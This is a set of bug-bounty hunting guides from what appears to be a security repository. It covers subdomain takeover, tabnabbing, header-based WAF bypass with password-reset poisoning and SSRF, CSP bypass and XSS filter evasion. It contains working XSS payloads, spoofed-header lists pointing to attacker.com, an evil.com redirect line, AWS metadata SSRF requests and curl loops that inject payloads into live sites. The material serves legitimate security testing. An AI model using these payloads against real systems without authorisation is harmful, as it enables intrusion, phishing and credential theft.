40 | ### 3. Hijacking the subdomain
41 | Use the following github repositiory to check if the engine is vulnerable or not and the steps for hijacking a particular engine.
42 | * [https://github.com/EdOverflow/can-i-take-over-xyz](https://github.com/EdOverflow/can-i-take-over-xyz)
43 | 
44 | If you cannot find your engine in the above repository, [Google](https://www.google.com) is your friend !
45 | 
46 | # Case : CNAME available to buy
47 | ![CNAME available to buy](cname_buy.png)
48 | * There are cases when the CNAME that a subdomain points to, is available to buy. 
49 | * In that case the attacker can directly buy that domain and host his/her content.
50 | 
51 | ### References
52 | [How we Hijacked 26+ Subdomains](https://medium.com/@aishwaryakendle/how-we-hijacked-26-subdomains-9c05c94c7049)
53 | 
54 | [Subdomain Takeover: Finding Candidates](https://0xpatrik.com/subdomain-takeover-candidates/)
55 | 
56 | [Subdomain Takeover: Proof Creation for Bug Bounties](https://0xpatrik.com/takeover-proofs/)
57 | 
58 | #### Check out our talk on the same at NULL / OWASP Bangalore meetup, June 2020
59 | [https://www.youtube.com/watch?v=xCunHBH8ZQ4](https://www.youtube.com/watch?v=xCunHBH8ZQ4)
60 | 
61 | ### Reports (Hackerone)
62 | 
63 | #### Resolved
64 | 
65 | - [subdomain takeover at news-static.semrush.com](https://hackerone.com/reports/294201)
66 | - [Subdomain takeover of resources.hackerone.com](https://hackerone.com/reports/863551)
67 | - [Subdomain takeover at info.hacker.one](https://hackerone.com/reports/202767)
68 | - [Bulgaria - Subdomain takeover of mail.starbucks.bg](https://hackerone.com/reports/736863)
69 | - [Remote code execution by hijacking an unclaimed S3 bucket in Rocket.Chat's installation script.](https://hackerone.com/reports/399166)
70 | - [Possible SOP bypass in www.starbucks.com due to insecure crossdomain.xml](https://hackerone.com/reports/244504)
71 | 
72 | # Authors:
73 | [@aish_kendle](https://twitter.com/aish_kendle)
74 | 
75 | [@thakare_prateek](https://twitter.com/thakare_prateek)
76 | 
77 | [@klaus](https://twitter.com/klaus_dev)
78 | 


--------------------------------------------------------------------------------
/Subdomain_Takeover/cname.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/KathanP19/HowToHunt/8258fb12d3cbdf9ec8aa22f63f9bc1b0ee16f69b/Subdomain_Takeover/cname.png


--------------------------------------------------------------------------------
/Subdomain_Takeover/cname_buy.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/KathanP19/HowToHunt/8258fb12d3cbdf9ec8aa22f63f9bc1b0ee16f69b/Subdomain_Takeover/cname_buy.png


--------------------------------------------------------------------------------
/Subdomain_Takeover/dns.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/KathanP19/HowToHunt/8258fb12d3cbdf9ec8aa22f63f9bc1b0ee16f69b/Subdomain_Takeover/dns.png


--------------------------------------------------------------------------------
/Subdomain_Takeover/subdomain_takeover.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/KathanP19/HowToHunt/8258fb12d3cbdf9ec8aa22f63f9bc1b0ee16f69b/Subdomain_Takeover/subdomain_takeover.png


--------------------------------------------------------------------------------
/Tabnabbing/Tabnabbing.md:
--------------------------------------------------------------------------------
 1 | # Tabnabbing
 2 | 
 3 | Even though this vulnerability is rated by many bug bounty programs as a low severity bug, it is worth looking for it as it is very easy to find. 
 4 | 
 5 | ### More information about the vulnerability:
 6 | 
 7 | When tabnabbing, the attacker searches for links that are inserted into the website and are under his control. Such links may be contained in a forum post, for example. Once he has found this kind of functionality, it checks that the link's `rel` attribute does not contain the value `noopener` and the target attribute contains the value `_blank`. If this is the case, the website is vulnerable to tabnabbing. 
 8 | 
 9 | ### How to exploit: 
10 | ```
11 | 1. Attacker posts a link to a website under his control that contains the following JS code: window.opener.location = "http://evil.com"
12 | 2. He tricks the victim into visiting the link, which is opened in the browser in a new tab.
13 | 3. At the same time the JS code is executed and the background tab is redirected to the website evil.com, which is most likely a phishing website.
14 | 4. If the victim opens the background tab again and doesn't look at the address bar, it may happen that he thinks he is logged out, because a login page appears, for example.
15 | 5. The victim tries to log on again and the attacker receives the credentials
16 | ```
17 | 
18 | ### How to search for it: 
19 | 
20 | As already mentioned, you have to search for the following link formats: 
21 | 
22 | ```html
23 | <a href="..." target="_blank" rel="" />  
24 | or
25 | <a href="..." target="_blank" />
26 | ```
27 | 
28 | ### Author
29 | 
30 | * [@bolli95](https://github.com/bolli95)
31 | 


--------------------------------------------------------------------------------
/WAF_Bypasses/WAF_Bypass_Using_headers.md:
--------------------------------------------------------------------------------
  1 | # **WAF Bypass Using Headers (Password Reset Poisoning)**
  2 | 
  3 | ## **Introduction**
  4 | Web Application Firewalls (WAFs) are commonly used to filter and monitor HTTP traffic to protect web applications from attacks. However, attackers can bypass WAFs by **manipulating HTTP headers**. One such attack involves **Password Reset Poisoning**, where an attacker leverages forged headers to manipulate the behavior of the application, particularly in password reset functionalities.
  5 | 
  6 | This document outlines techniques to **bypass WAFs** using custom headers, including examples of how they can be used in **password reset poisoning** and other similar attacks.
  7 | 
  8 | ---
  9 | 
 10 | ## **How Does WAF Header Manipulation Work?**
 11 | Many web applications rely on **HTTP headers** to determine a user's origin, session, or intended destination. By modifying these headers, an attacker can:
 12 | - Trick the application into believing the request is coming from a trusted source.
 13 | - Redirect password reset links to an attacker's domain.
 14 | - Bypass security measures by manipulating `X-Forwarded-For`, `Referer`, or `Origin` headers.
 15 | - Spoof a legitimate user by injecting headers used for authentication.
 16 | 
 17 | Some applications also have misconfigured **reverse proxies**, which trust certain headers to determine the client’s IP address, allowing **internal access** through header manipulation.
 18 | 
 19 | ---
 20 | 
 21 | ## **Common Headers Used for WAF Bypass**
 22 | Below are the most commonly used headers for WAF bypass and server-side manipulation:
 23 | 
 24 | ```
 25 | X-Forwarded-Host: attacker.com
 26 | X-Forwarded-Port: 443
 27 | X-Forwarded-Scheme: https
 28 | Origin: null
 29 | nullOrigin: [siteDomain].attacker.com
 30 | X-Frame-Options: Allow
 31 | X-Forwarded-For: 127.0.0.1
 32 | X-Client-IP: 127.0.0.1
 33 | Client-IP: 127.0.0.1
 34 | Proxy-Host: 127.0.0.1
 35 | Request-Uri: 127.0.0.1
 36 | X-Forwarded: 127.0.0.1
 37 | X-Forwarded-By: 127.0.0.1
 38 | X-Forwarded-For: 127.0.0.1
 39 | X-Forwarded-For-Original: 127.0.0.1
 40 | X-Forwarded-Host: 127.0.0.1
 41 | X-Forwarded-Server: 127.0.0.1
 42 | X-Forwarder-For: 127.0.0.1
 43 | X-Forward-For: 127.0.0.1
 44 | Base-Url: 127.0.0.1
 45 | Http-Url: 127.0.0.1
 46 | Proxy-Url: 127.0.0.1
 47 | Redirect: 127.0.0.1
 48 | Real-Ip: 127.0.0.1
 49 | Referer: 127.0.0.1
 50 | Referrer: 127.0.0.1
 51 | Refferer: 127.0.0.1
 52 | Uri: 127.0.0.1
 53 | Url: 127.0.0.1
 54 | X-Host: 127.0.0.1
 55 | X-Http-Destinationurl: 127.0.0.1
 56 | X-Http-Host-Override: 127.0.0.1
 57 | X-Original-Remote-Addr: 127.0.0.1
 58 | X-Original-Url: 127.0.0.1
 59 | X-Proxy-Url: 127.0.0.1
 60 | X-Rewrite-Url: 127.0.0.1
 61 | X-Real-Ip: 127.0.0.1
 62 | X-Remote-Addr: 127.0.0.1
 63 | X-Custom-IP-Authorization: 127.0.0.1
 64 | X-Originating-IP: 127.0.0.1
 65 | X-Remote-IP: 127.0.0.1
 66 | X-Original-Url:
 67 | X-Forwarded-Server:
 68 | X-Host:
 69 | X-Forwarded-Host:
 70 | X-Rewrite-Url:
 71 | ```
 72 | 
 73 | ---
 74 | 
 75 | ## **Practical Attack Scenario: Password Reset Poisoning**
 76 | ### **Step 1: Identifying the Vulnerability**
 77 | - Many web applications send password reset links based on the **Host** or **Origin** headers.
 78 | - If these headers are **not validated properly**, an attacker can **poison** the password reset URL.
 79 | 
 80 | ### **Step 2: Sending a Manipulated Request**
 81 | **Example Request:**
 82 | ```http
 83 | POST /reset-password HTTP/1.1
 84 | Host: victim-site.com
 85 | X-Forwarded-Host: attacker.com
 86 | X-Forwarded-For: 127.0.0.1
 87 | X-Real-IP: 127.0.0.1
 88 | Content-Type: application/x-www-form-urlencoded
 89 | 
 90 | email=victim@victim.com
 91 | ```
 92 | 
 93 | ### **Step 3: Intercepting the Response**
 94 | If the server does not validate the `X-Forwarded-Host` header, it might send a **password reset link to the victim** that looks like this:
 95 | 
 96 | ```
 97 | https://attacker.com/reset?token=abcdef123456
 98 | ```
 99 | 
100 | Now, when the victim clicks on the reset link, they will be redirected to the attacker's site, where their credentials can be **stolen via phishing**.
101 | 
102 | ---
103 | 
104 | ## **Other Uses of WAF Header Manipulation**
105 | ### **1. Bypassing IP-Based Restrictions**
106 | - Some web applications **block access** based on the user’s IP address.
107 | - If the WAF **trusts headers** like `X-Forwarded-For`, an attacker can **spoof their IP** and gain access.
108 | 
109 | **Example Request:**
110 | ```http
111 | GET /admin HTTP/1.1
112 | Host: target.com
113 | X-Forwarded-For: 192.168.1.100
114 | ```
115 | - If `192.168.1.100` is a **trusted internal IP**, access will be granted.
116 | 
117 | ---
118 | 
119 | ### **2. Exploiting Open Redirects**
120 | Some applications use `Referer`, `Redirect`, or `X-Forwarded-Host` to construct redirect URLs.
121 | 
122 | **Example Request:**
123 | ```http
124 | GET /login?redirect=https://victim.com HTTP/1.1
125 | Host: target.com
126 | X-Forwarded-Host: attacker.com
127 | ```
128 | - The victim is redirected to a phishing page **hosted by the attacker**.
129 | 
130 | ---
131 | 
132 | ### **3. SSRF (Server-Side Request Forgery) Exploitation**
133 | Some applications **fetch remote resources** based on user input. By modifying headers, an attacker can:
134 | - Force the application to fetch **internal resources**.
135 | - Target **AWS metadata services** or other sensitive internal services.
136 | 
137 | **Example Request:**
138 | ```http
139 | GET /api/v1/fetch HTTP/1.1
140 | Host: target.com
141 | X-Forwarded-For: 169.254.169.254
142 | X-Real-IP: 169.254.169.254
143 | ```
144 | - If the application fetches the resource using these headers, it could **leak AWS credentials** or **internal system information**.
145 | 
146 | ---
147 | 
148 | ## **Author**
149 | - **[Virdoex_hunter](https://twitter.com/Virdoex_hunter)**
150 | - **[remonsec](https://x.com/remonsec)**
151 | 
152 | ---
153 | *Enhanced and reformatted for HowToHunt repository by [remonsec](https://x.com/remonsec)*
154 | 


--------------------------------------------------------------------------------
/Weak_Password_Policy/Weak_password_policy.md:
--------------------------------------------------------------------------------
 1 | <h4>Summary:</h4>
 2 | 
 3 | A weak password policy increases the probability of an attacker having success using brute force and dictionary attacks against user accounts. An attacker who can determine user passwords can take over a user's account and potentially access sensitive data in the application.
 4 | 
 5 | There are two ways in which this can be checked 
 6 | 
 7 | ### First Way 
 8 | 
 9 | - Check if you can use Password same as that of Email Address
10 | - Check if you can use Username same as that of Email Address
11 | - Try above mentioned when Resetting Password , Creating Account , Changing Password from Account Settings
12 | 
13 | ### Second Way 
14 | 
15 | - Check if you can use Password some Weak Passwords such as 123456, 111111 , abcabc , qwerty123
16 | - Try above mentioned when Resetting Password , Creating Account , Changing Password from Account Settings
17 | 
18 | * Applications usually have Restrictions on Password while Creating Account, Make sure you check for both the cases when Resetting Password
19 | 
20 | 
21 | ### References
22 | 
23 | - [All About Weak Password Policy](http://applicationsecurity.io/appsec-findings-database/weak-password-policy/)
24 | - [OWASP Guide for Weak Passwords](https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/04-Authentication_Testing/07-Testing_for_Weak_Password_Policy)
25 | 


--------------------------------------------------------------------------------
/Web_Source_Review/codereviewtips.md:
--------------------------------------------------------------------------------
 1 | # Code review:-
 2 | 
 3 | by performing source code review we can find some web application vulnerabilities
 4 | 
 5 | 
 6 | ### 1.Important functions first
 7 | ------------------------------------
 8 | When reading source code, 
 9 | focus on important functions such as authentication, password reset, state-changing actions and sensitive info reads. 
10 | (What is the most important would depend on the application.) 
11 | Then, review how these components interact with other functionality.
12 |  Finally, audit other less sensitive parts of the application.
13 | 
14 | ### 2.Follow user input
15 | ------------------------------
16 | 
17 | Another approach is to follow the code that processes user input. 
18 | User input such as HTTP request parameters, HTTP headers, HTTP request paths, database entries, file reads, and 
19 | file uploads provide the entry points for attackers to exploit the application’s vulnerabilities.This may also help us to
20 | find some critical vulnerabilities like xxe,xxs,sql injection
21 | 
22 | ### 3.Hardcoded secrets and credentials: 
23 | -------------------------------------------------------
24 | Hardcoded secrets such as API keys, encryption keys and database passwords can be easily discovered during a 
25 | source code review. You can grep for keywords such as “key”, “secret”, “password”, “encrypt” or regex search 
26 | for hex or base64 strings (depending on the key format in use).
27 | 
28 | ### 4.Use of dangerous functions and outdated dependencies: 
29 | ----------------------------------------------------------------------------------
30 | Unchecked use of dangerous functions and outdated dependencies are a huge source of bugs.
31 |  Grep for specific functions for the language you are using and search through the dependency versions list to 
32 | see if they are outdated.
33 | 
34 | ### 5.Developer comments, hidden debug functionalities, configuration files, and the .git directory:
35 | -----------------------------------------------------------------------------------------------------------------------
36 |  These are things that developers often forget about and they leave the application in a dangerous state. 
37 | Developer comments can point out obvious programming mistakes, hidden debug functionalities often lead to
38 |  privilege escalation, config files allow attackers to gather more information about your infrastructure and finally, 
39 | an exposed .git directory allows attackers to reconstruct your source code.
40 | 
41 | ### 6.Hidden paths, deprecated endpoints, and endpoints in development:
42 | -----------------------------------------------------------------------------------------------------
43 |  These are endpoints that users might not encounter when using the application normally. But if they work and 
44 | they are discovered by an attacker, it can lead to vulnerabilities such as authentication bypass and sensitive 
45 | information leak, depending on the exposed endpoint.
46 | 
47 | 
48 | 
49 | ### 7.Weak cryptography or hashing algorithms: 
50 | -----------------------------------------------------------------------------------------------------------------------
51 | This is an issue that is hard to find during a black-box test, but easy to spot when reviewing source code. 
52 | Look for issues such as weak encryption keys, breakable encryption algorithms, and weak hashing algorithms. 
53 | Grep for terms like ECB, MD4, and MD5.
54 | 
55 | ### 8.Missing security checks on user input and regex strength:
56 | -----------------------------------------------------------------------------------------------------
57 | Reviewing source code is a great way to find out what kind of security checks are missing. 
58 | Read through the application’s documentation and test all the edge cases that you can think of. 
59 | A great resource for what kind of edge cases that you should consider is PayloadsAllTheThings.(github)
60 | 
61 | ### 9.Missing cookie flags:
62 | ----------------------------------------------------------------- 
63 | Look out for missing cookie flags such as httpOnly and secure.
64 | 
65 | 
66 | ### 10.Unexpected behavior, conditionals, unnecessarily complex and verbose  functions: 
67 | --------------------------------------------------------------------------------------------------------------------
68 | Additionally, pay special attention to the application’s unexpected behavior, conditionals, and complex functions. 
69 | These locations are where obscure bugs are often discovered.
70 | 
71 | ### Authors
72 | * [@harsha0x01](https://twitter.com/harsha0x01)
73 | 


--------------------------------------------------------------------------------
/XSS/Automated_XSS.md:
--------------------------------------------------------------------------------
 1 | # Automating XSS Detection Using Dalfox, WaybackURLs, and GF Patterns
 2 | 
 3 | ## Prerequisites: Installing Go on Your Machine
 4 | 
 5 | Before proceeding, ensure that **Go** is installed on your system. You can install it using the following commands:
 6 | 
 7 | ```bash
 8 | sudo apt install -y golang
 9 | export GOROOT=/usr/lib/go
10 | export GOPATH=$HOME/go
11 | export PATH=$GOPATH/bin:$GOROOT/bin:$PATH
12 | source .bashrc
13 | ```
14 | 
15 | ---
16 | 
17 | ## Hunting Blind XSS Using Dalfox
18 | 
19 | To detect blind XSS vulnerabilities, follow these steps:
20 | 
21 | 1. Use **WaybackURLs** to extract URLs for the target.
22 | 2. Use **GF patterns** to identify possible XSS-vulnerable parameters.
23 | 3. Utilize **Dalfox** to detect XSS.
24 | 
25 | ### Execution Command:
26 | ```bash
27 | waybackurls testphp.vulnweb.com | gf xss | sed 's/=.*/=/' | sort -u | tee Possible_xss.txt && \
28 | cat Possible_xss.txt | dalfox -b blindxss.xss.ht pipe > output.txt
29 | ```
30 | 
31 | ---
32 | 
33 | ## Hunting Reflected XSS
34 | 
35 | To identify reflected XSS vulnerabilities, follow these steps:
36 | 
37 | 1. Extract URLs using **WaybackURLs**.
38 | 2. Use **qsreplace** to inject payloads and analyze responses.
39 | 
40 | ### Execution Command:
41 | ```bash
42 | waybackurls testphp.vulnweb.com | grep '=' | qsreplace '"><script>alert(1)</script>' | \
43 | while read host; do
44 |     curl -s --path-as-is --insecure "$host" | grep -qs "<script>alert(1)</script>" && \
45 |     echo "$host \033[0;31m Vulnerable"
46 | done
47 | ```
48 | 
49 | ---
50 | 
51 | ## Identifying Parameters That Do Not Filter Special Characters
52 | 
53 | The following command checks whether parameters accept special characters without proper sanitization:
54 | 
55 | ```bash
56 | echo "test.url" | waybackurls | grep "=" | tee waybackurls.txt
57 | cat waybackurls.txt | egrep -iv ".(jpg|jpeg|js|css|gif|tif|tiff|png|woff|woff2|ico|pdf|svg|txt)" | \
58 | qsreplace '"><()' | tee combinedfuzz.json && \
59 | cat combinedfuzz.json | while read host; do
60 |     curl --silent --path-as-is --insecure "$host" | grep -qs "\"><()" && \
61 |     echo -e "$host \033[91m Vulnerable \e[0m \n" || \
62 |     echo -e "$host \033[92m Not Vulnerable \e[0m \n"
63 | done | tee XSS.txt
64 | ```
65 | 
66 | ---
67 | 
68 | ## Downloading the Required Tools
69 | 
70 | The following tools are required for this process:
71 | 
72 | | Tool | GitHub Repository |
73 | |------|------------------|
74 | | **Dalfox** | [Dalfox](https://github.com/hahwul/dalfox) |
75 | | **WaybackURLs** | [WaybackURLs](https://github.com/tomnomnom/waybackurls) |
76 | | **GF** | [GF](https://github.com/tomnomnom/gf) |
77 | | **GF Patterns** | [GF Patterns](https://github.com/1ndianl33t/Gf-Patterns) |
78 | | **qsreplace** | [qsreplace](https://github.com/tomnomnom/qsreplace) |
79 | 
80 | A complete script can be found here: [QuickXSS](https://github.com/theinfosecguy/QuickXSS)
81 | 
82 | ---
83 | 
84 | ## Contact Information
85 | 
86 | For any questions or further discussions, feel free to reach out on Twitter:
87 | 
88 | - [@g0t_rOoT_](https://twitter.com/g0t_rOoT_)
89 | - [@Fani Malik](https://twitter.com/fanimalikhack)
90 | - [@Faizee Asad](https://twitter.com/faizee_asad)
91 | - [@Prince Prafull](https://twitter.com/princeprafull3)
92 | 
93 | ---
94 | 
95 | *Enhanced and reformatted for HowToHunt repository by [remonsec](https://x.com/remonsec)*
96 | 


--------------------------------------------------------------------------------
/XSS/Bypass_CSP.md:
--------------------------------------------------------------------------------
  1 | # Content Security Policy (CSP)
  2 | 
  3 | ## What is CSP?
  4 | 
  5 | Content Security Policy (CSP) is a security mechanism that defines which resources can be fetched or executed by a web page. It acts as a security policy that controls which scripts, images, and iframes can be executed on a specific page and from which sources. CSP is implemented using response headers or meta elements within an HTML page. Once implemented, the browser enforces the policy and actively blocks any violations detected.
  6 | 
  7 | ---
  8 | 
  9 | ## How Does CSP Work?
 10 | 
 11 | CSP works by restricting the sources from which active and passive content can be loaded. Additionally, it enforces security policies such as preventing the execution of inline JavaScript, disabling the use of `eval()`, and limiting resource loading to specific origins.
 12 | 
 13 | ---
 14 | 
 15 | ## Defining CSP Rules
 16 | 
 17 | The following example illustrates a CSP configuration:
 18 | 
 19 | ```plaintext
 20 | default-src 'none';
 21 | img-src 'self';
 22 | script-src 'self' https://code.jquery.com;
 23 | style-src 'self';
 24 | report-uri /__cspreport__;
 25 | font-src 'self' https://addons.cdn.mozilla.net;
 26 | frame-src 'self' https://ic.paypal.com https://paypal.com;
 27 | media-src https://videos.cdn.mozilla.net;
 28 | object-src 'none';
 29 | ```
 30 | 
 31 | ---
 32 | 
 33 | ## Key CSP Directives
 34 | 
 35 | Below are some important CSP directives and their functions:
 36 | 
 37 | 1. **script-src:** Defines allowed sources for JavaScript execution, including inline scripts and external script files.
 38 | 2. **default-src:** Sets the default policy for resource loading when specific fetch directives are not defined.
 39 | 3. **child-src:** Controls allowed sources for web workers and embedded frames.
 40 | 4. **connect-src:** Restricts URLs used in interfaces such as `fetch`, `WebSocket`, and `XMLHttpRequest`.
 41 | 5. **frame-src:** Defines allowed sources for `<frame>` and `<iframe>` elements.
 42 | 6. **frame-ancestors:** Specifies which sources can embed the current page in `<frame>`, `<iframe>`, `<object>`, or `<embed>` elements.
 43 | 7. **img-src:** Defines allowed sources for loading images.
 44 | 8. **manifest-src:** Specifies allowed sources for application manifest files.
 45 | 9. **media-src:** Defines sources for loading media files such as audio and video.
 46 | 10. **object-src:** Restricts the sources for `<object>`, `<embed>`, and `<applet>` elements.
 47 | 11. **base-uri:** Specifies allowed base URLs that can be loaded using the `<base>` element.
 48 | 12. **form-action:** Lists valid endpoints for form submissions using `<form>` elements.
 49 | 13. **plugin-types:** Restricts the MIME types of plugins that can be invoked.
 50 | 14. **sandbox:** Applies various security restrictions on loaded resources, such as preventing pop-ups, restricting script execution, and enforcing the same-origin policy.
 51 | 15. **upgrade-insecure-requests:** Instructs browsers to upgrade HTTP requests to HTTPS.
 52 | 
 53 | ---
 54 | 
 55 | ## CSP Bypass Techniques
 56 | 
 57 | ### 1. CSP Misconfiguration
 58 | 
 59 | One of the most common reasons for CSP bypass is the use of insecure values in policy definitions. Consider the following CSP header:
 60 | 
 61 | ```plaintext
 62 | default-src 'self' *;
 63 | ```
 64 | 
 65 | - The `default-src` directive acts as a fallback policy for all fetch directives.
 66 | - The wildcard `*` allows loading resources from any source.
 67 | - This effectively nullifies the security benefits of CSP.
 68 | 
 69 | Another example:
 70 | 
 71 | ```plaintext
 72 | script-src 'unsafe-inline' 'unsafe-eval' 'self' data: https://www.google.com http://www.google-analytics.com/gtm/js  https://*.gstatic.com/feedback/ https://accounts.google.com;
 73 | ```
 74 | 
 75 | - The `script-src` directive allows JavaScript execution from the specified sources.
 76 | - The presence of `'unsafe-inline'` permits inline JavaScript execution, which can lead to Cross-Site Scripting (XSS).
 77 | - The presence of `data:` allows loading JavaScript from `data:` URLs, making it easier for attackers to inject malicious scripts.
 78 | 
 79 | Example exploit:
 80 | 
 81 | ```html
 82 | <iframe src="data:text/html,<svg onload=alert(1)>"></iframe>
 83 | ```
 84 | 
 85 | ---
 86 | 
 87 | ### 2. JSONP-Based CSP Bypass
 88 | 
 89 | JSONP (JSON with Padding) is a technique used to bypass the Same-Origin Policy (SOP) by injecting JavaScript payloads into API responses. If a JSONP endpoint is included in the `script-src` policy, it can be exploited to inject malicious scripts.
 90 | 
 91 | Example JSONP endpoint:
 92 | 
 93 | ```plaintext
 94 | https://accounts.google.com/o/oauth2/revoke?callback=alert(1337)
 95 | ```
 96 | 
 97 | If a CSP policy includes `accounts.google.com` in the `script-src` directive, an attacker can exploit it as follows:
 98 | 
 99 | ```plaintext
100 | something.example.com?vuln_param=https://accounts.google.com/o/oauth2/revoke?callback=alert(1337)
101 | ```
102 | 
103 | This allows JavaScript execution from an external source, effectively bypassing CSP.
104 | 
105 | ---
106 | 
107 | ### 3. CSP Injection
108 | 
109 | CSP injection occurs when user-controlled input is reflected in the CSP header. Consider the following vulnerable URL:
110 | 
111 | ```plaintext
112 | example.com?vuln=something_vuln_csp
113 | ```
114 | 
115 | If the value of `vuln` is directly inserted into the CSP header, an attacker can manipulate the policy:
116 | 
117 | ```plaintext
118 | script-src something_vuln_csp;
119 | object-src 'none';
120 | base-uri 'none';
121 | require-trusted-types-for 'script';
122 | report-uri https://csp.example.com;
123 | ```
124 | 
125 | By modifying the `script-src` directive, an attacker can include a malicious domain, allowing external JavaScript execution.
126 | 
127 | ---
128 | 
129 | ## Author
130 | 
131 | For further information or discussions, feel free to reach out to:
132 | 
133 | - **[@harsha0x01](https://twitter.com/harsha0x01)**
134 | 
135 | ---
136 | 
137 | *Enhanced and reformatted for HowToHunt repository by [remonsec](https://x.com/remonsec)*
138 | 


--------------------------------------------------------------------------------
/XSS/XSS_Bypass.md:
--------------------------------------------------------------------------------
 1 | # XSS Filter Bypass Techniques
 2 | 
 3 | ## Introduction
 4 | 
 5 | For those new to Cross-Site Scripting (XSS) attacks, it is essential to first understand the fundamental concepts before exploring filter bypass techniques.
 6 | 
 7 | ---
 8 | 
 9 | ## Alternatives to `alert()`
10 | 
11 | Many web applications block the `alert()` function to mitigate XSS attacks. Below are alternative functions that can be used:
12 | 
13 | - **`confirm()`** instead of `alert()`
14 | - **`prompt()`** instead of `alert()`
15 | - **`console.log()`** instead of `alert()`
16 | - **`eval()`** instead of `alert()`
17 | 
18 | ---
19 | 
20 | ## Alternatives to the `onerror` Event Handler
21 | 
22 | If the `onerror` event handler is blocked, the following alternatives can be used to trigger JavaScript execution:
23 | 
24 | - **`onload`**
25 | - **`onfocus`**
26 | - **`onmouseover`**
27 | - **`onblur`**
28 | - **`onclick`**
29 | - **`onscroll`**
30 | 
31 | These event handlers can be embedded within HTML elements to execute scripts when the event is triggered.
32 | 
33 | ---
34 | 
35 | ## Handling Parentheses Filtering
36 | 
37 | If parentheses `()` are filtered, backticks `` ` ` `` can be used as an alternative. Examples:
38 | 
39 | ```html
40 | <script>alert`1`</script>
41 | <img src=x onerror=alert`1`>
42 | <img src=x onerror=prompt`1`>
43 | javascript:prompt`1`
44 | javascript:alert`1`
45 | ```
46 | 
47 | This method is effective against weak input sanitization mechanisms that only block standard function calls enclosed in parentheses.
48 | 
49 | ---
50 | 
51 | ## Additional Resources
52 | 
53 | For further learning and reference, the following resources provide comprehensive details on XSS filter evasion techniques:
54 | 
55 | 1. **PortSwigger XSS Cheat Sheet** - [Visit PortSwigger](https://portswigger.net/web-security/cross-site-scripting/cheat-sheet)
56 | 2. **OWASP XSS Filter Evasion Cheat Sheet** - [Visit OWASP](https://owasp.org/www-community/xss-filter-evasion-cheatsheet)
57 | 
58 | ---
59 | 
60 | ## Contact Information
61 | 
62 | For discussions and insights, you can connect with:
63 | 
64 | - **[@Fani Malik](https://twitter.com/fanimalikhack/)**
65 | 
66 | ---
67 | *Enhanced and reformatted for HowToHunt repository by [remonsec](https://x.com/remonsec)*
68 | 


--------------------------------------------------------------------------------
/XSS/Xss.md:
--------------------------------------------------------------------------------
  1 | # **Comprehensive Guide to XSS Exploitation Techniques and Bypasses**
  2 | 
  3 | ## **1. Reflected XSS Methods**
  4 | Reflected XSS attacks exploit vulnerabilities where user input is included in the response without proper sanitization. Below are some common approaches.
  5 | 
  6 | ### **Mind Map for Reflected XSS**
  7 | An extensive mind map detailing approaches to reflected XSS can be found here:  
  8 | **[Reflected XSS Mindmap](https://github.com/A9HORA/Reflected-XSS-Mindmap)** by **[@A9HORA](https://twitter.com/A9HORA)**.
  9 | 
 10 | ### **1.1 Using Burp Suite**
 11 | 1. Install the **Reflection** and **Sentinel** plugins for Burp Suite.
 12 | 2. Walk and spider the target site.
 13 | 3. Inspect the **reflected parameters** tab in Burp.
 14 | 4. Send parameters to **Sentinel** for automated analysis or verify manually.
 15 | 
 16 | ### **1.2 Using WaybackURLs and Similar Tools**
 17 | 1. Use **[Gau](https://github.com/lc/gau)** or **[WaybackURLs](https://github.com/tomnomnom/waybackurls)** to collect URLs.
 18 | 2. Filter parameters using `grep "="` or **GF patterns** and store them in a file.
 19 | 3. Run **[Gxss](https://github.com/KathanP19/Gxss)** or **[Bxss](https://github.com/ethicalhackingplayground/bxss/)** on the file.
 20 | 4. Manually inspect reflected parameters or use **[Dalfox](https://github.com/hahwul/dalfox)**.
 21 | 
 22 | ### **1.3 Using Google Dorks**
 23 | 1. Use Google Dork: `site:target.com`
 24 | 2. Find links with parameters using dorks such as:
 25 |    - `site:target.com inurl:".php?"`
 26 |    - `site:target.com filetype:php`
 27 |    - **More dorks:** [Top 100 XSS Dorks](https://www.openbugbounty.org/blog/devl00p/top-100-xss-dorks/)
 28 | 3. Check if parameters are reflected in HTML.
 29 | 4. Inject XSS payloads or test with automated tools.
 30 | 
 31 | ### **1.4 Finding Hidden Variables in Source Code**
 32 | 1. Inspect JavaScript and HTML source files for hidden parameters.
 33 | 2. Search manually in **Page Source** for:
 34 |    - `var=`
 35 |    - `=""`
 36 |    - `=''`
 37 | 3. Append discovered parameters to URLs, e.g.,  
 38 |    `https://example.com?hiddenvariablename=xss`
 39 | 
 40 | ### **1.5 Other Techniques**
 41 | 1. Use **Methods 1 or 2** to gather URLs.
 42 | 2. Identify the **firewall** using [WhatWaf](https://github.com/Ekultek/WhatWaf).
 43 | 3. Find WAF bypass payloads:
 44 |    - Twitter search
 45 |    - [Awesome WAF Bypass](https://github.com/0xInfection/Awesome-WAF)
 46 | 4. Use **[Arjun](https://github.com/s0md3v/Arjun)** to discover hidden parameters.
 47 | 
 48 | ### **Additional Tips**
 49 | - Examine **error pages (404, 403, etc.)** for reflected values.
 50 | - Trigger a **403 error** by requesting the `.htaccess` file.
 51 | - Test **all reflected parameters** for XSS.
 52 | 
 53 | ### **Video References**
 54 | - [Reflected XSS Automation](https://www.youtube.com/watch?v=wuyAY3vvd9s)
 55 | - [Practical XSS Hunting](https://www.youtube.com/watch?v=GsyOuQBG2yM)
 56 | 
 57 | ---
 58 | 
 59 | ## **2. Stored XSS Methods**
 60 | Stored XSS occurs when malicious scripts are permanently stored on the target website.
 61 | 
 62 | ### **Steps for Detecting Stored XSS**
 63 | 1. Enumerate the firewall and identify WAF rules.
 64 | 2. Test payloads in fields such as:
 65 |    - **Username**
 66 |    - **Address**
 67 |    - **Email**
 68 | 3. Inject payloads in **profile picture filenames** and metadata.
 69 | 4. Attempt injections in **comments, reviews, and feedback sections**.
 70 | 5. Try **every input field** that reflects data to other users.
 71 | 6. Register an account with an XSS payload in the **name field**.
 72 | 
 73 | ### **Additional Tips**
 74 | - Test entity injection with:
 75 |   ```html
 76 |   <a href=#>test</a>
 77 |   ```
 78 | - If any payload is executed, refine and escalate the attack.
 79 | 
 80 | ### **Write-Up Reference**
 81 | - [How I Found My First Stored XSS](https://medium.com/@fatin151485/how-i-found-my-first-stored-xss-on-popular-eboighar-com-6bd497b0bb96)
 82 | 
 83 | ---
 84 | 
 85 | ## **3. Blind XSS**
